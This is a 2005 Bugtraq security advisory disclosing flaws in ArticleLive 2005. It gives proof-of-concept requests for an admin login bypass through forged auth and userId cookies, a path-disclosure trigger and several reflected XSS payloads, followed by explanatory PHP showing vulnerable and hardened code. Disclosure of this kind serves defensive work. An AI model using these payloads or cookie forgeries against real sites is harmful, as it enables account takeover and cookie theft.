
List:       bugtraq
Subject:    Authentication bypass, sql injections and xss in ArticleLive 2005
From:       dcrab <dcrab () hackerscenter ! com>
Date:       2005-05-03 20:55:27
Message-ID: 20050503205527.1033.qmail () www ! securityfocus ! com



Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's services to audit your web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah

***SPECIAL OFFER***
Hire my auditing services; if I don't find anything, it's FREE..!! http://www.digitalparadox.org/services.ah

Looking for publishers interested in my PHP Secure Coding Book.


Severity: High
Title: Authentication bypass, sql injections and xss in ArticleLive 2005
Date: 04/05/2005

Vendor: Interspire
Vendor Website: http://www.interspire.com/articlelive/
Summary: ArticleLive 2005 contains an authentication bypass, SQL injection and cross-site scripting (XSS) vulnerabilities.


Proof of Concept Exploits: 

http://www.example.com/admin/?
Full administrative authentication bypass

In the control panel, setting the cookies auth=1 and userId=1 gives full administrative access: the logged-in state is taken from cookie values the client controls, so no password is needed.
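The pattern behind this bypass, beside a session-based check that cannot be forged from the client, as an added example (my own illustrative PHP, not ArticleLive's code). The function names, the $userTable layout and the password are invented for the demo; $session stands in for $_SESSION so it runs from the command line, and it assumes PHP 7 or later.

```php
<?php
// Added illustration, not ArticleLive code. Assumes PHP >= 7.0.
// Names (isAdminVulnerable, loginHardened, $userTable) are invented for the demo.

// VULNERABLE: the "logged in as admin" decision is read straight from cookies
// the browser controls, so "Cookie: auth=1; userId=1" is all an attacker needs.
function isAdminVulnerable(array $cookie): bool
{
    return ($cookie['auth'] ?? '') == 1 && ($cookie['userId'] ?? '') == 1;
}

// HARDENED: the only thing stored client-side is the opaque session id; the
// admin flag is written into server-side session state after a real credential
// check. $session stands in for $_SESSION so the demo runs without a web server.
function loginHardened(string $user, string $pass, array $userTable, array &$session): bool
{
    $record = $userTable[$user] ?? null;
    if ($record === null || !password_verify($pass, $record['hash'])) {
        return false;   // unknown user or wrong password: no session state is set
    }
    // In a real handler call session_regenerate_id(true) here, so a session id
    // chosen before login (the PoC URLs carry PHPSESSID in the query string)
    // is not the one that becomes authenticated.
    $session = ['userId' => $record['id'], 'isAdmin' => $record['isAdmin']];
    return true;
}

function isAdminHardened(array $session): bool
{
    return !empty($session['isAdmin']);
}

// --- Demo with constructed data.
$userTable = [
    'admin' => ['id' => 1, 'isAdmin' => true, 'hash' => password_hash('correct horse', PASSWORD_DEFAULT)],
];
$forgedCookie = ['auth' => '1', 'userId' => '1'];   // no password involved

var_dump(isAdminVulnerable($forgedCookie));          // the forged cookie alone is accepted

$session = [];
loginHardened('admin', 'guess', $userTable, $session);
var_dump(isAdminHardened($session));                 // wrong password: still not admin
loginHardened('admin', 'correct horse', $userTable, $session);
var_dump(isAdminHardened($session));                 // real credentials: admin
```

The point is where the authorisation state lives: in the vulnerable form the client asserts it, in the hardened form the server records it after verifying a credential, and the cookie only carries a session identifier that is regenerated at login.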


http://www.example.com/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='&Categories=0
 Information Disclosure / Full Path Disclosure (the quote in Query triggers PHP warnings that reveal the install path):

Warning: Wrong datatype for second argument in call to in_array in /home/httpd/vhosts/example.com/httpdocs/admin/includes/classes/class.category.php on line 460

Warning: Bad arguments to implode() in /home/httpd/vhosts/example.com/httpdocs/templates/Default (Stretched)/Panels/SearchResultsPanel.php on line 163


http://www.example.com/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Categories=0
 XSS


http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username='"><script>alert(document.cookie)</script>&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=dcrab&Picture=dcrab
 XSS


http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName='"><script>alert(document.cookie)</script>&LastName=&Email=&Biography=dcrab&Picture=dcrab
 XSS


http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName='"><script>alert(document.cookie)</script>&Email=&Biography=dcrab&Picture=dcrab
 XSS


http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email='"><script>alert(document.cookie)</script>&Biography=dcrab&Picture=dcrab
 XSS


http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Picture=dcrab
 XSS


http://www.example.com/blogs/newcomment/?BlogId='"><script>alert(document.cookie)</script>
 XSS


Possible Fixes: Escape user input with mysql_real_escape_string() (preferred over mysql_escape_string(), which ignores the connection character set), or better, bind it through parameterised queries, before it reaches the MySQL database; encode it with htmlspecialchars() (with ENT_QUOTES, since the payloads above break out of an attribute with a single quote) before echoing it to the page; and disable display_errors in production so PHP warnings cannot reveal the install path. The authentication bypass is not an escaping problem: the admin check must rely on server-side session state set after a successful login, never on cookie values the client can set.
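Applied to the search handler, as an added example (my own PHP, not Interspire's code): it binds the query and category ids instead of splicing them into SQL, sends warnings to the log rather than the response so they cannot leak the install path, and encodes output with ENT_QUOTES so the '"> and </textarea> payloads above are neutralised. The articles table, its columns, the function names and the sample rows are invented for the demo; it assumes PHP 7 or later with pdo_sqlite.

```php
<?php
// Added illustration, not ArticleLive code. Assumes PHP >= 7.0 with pdo_sqlite.
// Table/column names and sample rows are invented for the demo.

// Full path disclosure: warnings go to the error log, never to the response.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// SQL: the search term and category ids are bound parameters, so a lone quote
// (Query=') is data, not syntax. No mysql_real_escape_string() call is needed
// when every user-controlled value is bound.
function searchArticles(PDO $db, string $query, $categories): array
{
    // Categories=0 arrived as a scalar where an array was expected, hence the
    // in_array()/implode() warnings. Cast to a list of ints; 0 means "no filter".
    $ids = array_values(array_filter(array_map('intval', (array) $categories)));

    $sql    = 'SELECT id, title FROM articles WHERE title LIKE ?';
    $params = ['%' . $query . '%'];   // % and _ stay LIKE wildcards, but cannot alter the statement
    if ($ids !== []) {
        $sql .= ' AND categoryId IN (' . implode(',', array_fill(0, count($ids), '?')) . ')';
        $params = array_merge($params, $ids);
    }
    $stmt = $db->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// XSS: encode at output time. ENT_QUOTES is essential here because the PoCs
// close an attribute with '"> before injecting <script>; the default flags
// leave the single quote alone. The same call turns the </textarea> breakout
// into harmless &lt;/textarea&gt;.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderResults(string $query, array $rows): string
{
    $html = '<p>Results for <input value="' . h($query) . '"></p><ul>';
    foreach ($rows as $row) {
        $html .= '<li>' . h($row['title']) . '</li>';
    }
    return $html . '</ul>';
}

// --- Demo with a constructed in-memory table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE articles (id INTEGER PRIMARY KEY, categoryId INTEGER, title TEXT)');
$db->exec("INSERT INTO articles VALUES (1, 2, 'Interspire news'), (2, 3, 'O''Reilly review')");

// The same inputs the PoC URLs send: a bare quote, and the reflected script.
foreach (["'", '"><script>alert(document.cookie)</script>'] as $query) {
    echo renderResults($query, searchArticles($db, $query, 0)), "\n";
}
```

Escaping on input, as the original fix suggests, is fragile because the same value is used in two contexts (SQL and HTML) with different rules; binding for the database and encoding at the point of output handles each context with the right tool.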

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author: 
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com. Please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://digitalparadox.org/.

